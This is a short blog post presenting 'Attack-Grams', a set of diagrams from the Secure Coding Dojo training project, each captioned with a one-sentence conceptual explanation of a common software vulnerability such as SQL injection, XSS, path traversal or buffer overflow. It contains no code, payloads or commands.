Attack-Grams

Simple visualizations of software attacks

The Secure Coding Dojo is an open source project that aims to enable developers to learn about common software vulnerabilities in a fun way.

Since a picture is worth a thousand words, especially for those of us who do not have the patience to read long articles about vulnerabilities, I have created a set of simple diagrams which explain software attacks.

I have recently embedded these “Attack-Grams” in the Secure Coding Dojo training material along with the source presentation document. I also enclose them below. Pull requests as well as constructive feedback are greatly appreciated! Enjoy!

Authentication Bypass occurs when the application does not prevent unknown users from accessing restricted functionality.

Reliance on Untrusted Inputs occurs when the application uses client side validation or simply stores variables used in a security decision somewhere where an attacker could change them.

Missing or Incorrect Authorization occurs when the application does not properly validate roles and permissions allowing for elevation of privilege.

If sensitive data is not protected, a security incident will lead to a full scale data breach.

Crypto algorithms are continuously put to the test so we must keep them up to date. MD5 is known to be exposed to collisions when two different files can result in the same checksum.

If password hashes are not salted attacks could still reverse the password.

A password guessing attack is the simplest type of hack. Lack of account lockout and lack of password complexity enforcements allow such attacks to happen.

Code that makes a security decision based on a comparison, is bypassed when a counter exceeds the maximum boundary and resets to negative.

When software is downloaded, especially over an insecure connection, it may be replaced with malware. If an integrity check is not used to verify the file checksum the user will end up executing the replacement.

Sites that allow unrestricted redirects may be leveraged in phishing attacks. The users will trust the first part of the url, but the site will betray their trust by redirecting to the evil page.

When sites reflect user input as is, they allow attackers to insert malicious scripts and alter functionality.

Sites with sensitive requests such as a bank money transfer, must prevent such requests from being hidden within other sites where they will be inadvertently executed by unsuspecting visitors.

Servers that allow file uploads must prevent executables and scripts from being uploaded by employing a file type whitelist and changing the file name and extension after upload.

Applications that process XML documents must disable processing of external entities. XML External Entities can be used to leak content of files from the host server.

With Path Traversal, also known as a dot dot slash attack, attackers can abuse a download link to access a file from a private directory.

OS Command Injection lets attackers piggyback malicious scripts when programs execute shell commands.

SQL Injection allows attackers to insert arbitrary database commands.

Deserialization attacks target applications that accept objects in binary or text format. For the attack to be possible, the application must reference unsafe classes that execute code when deserialized in the program memory. Unfortunately many commonly used 3rd party libraries include such classes.

Buffer Overflow allows attackers to cross variable boundaries and alter program data and even instructions.

Format String Injection allows attackers to leak program memory by passing unexpected format strings to the program.

Did you enjoy the Attack-Grams? Want to try the attacks yourself? Check out the Secure Coding Dojo Github repository here: https://github.com/trendmicro/SecureCodingDojo/wiki

If you’d like to learn more about Secure Coding check the Security Code Review 101 series here: https://medium.com/@paul_io/security-code-review-101-a3c593dc6854

Thanks for reading and safe coding!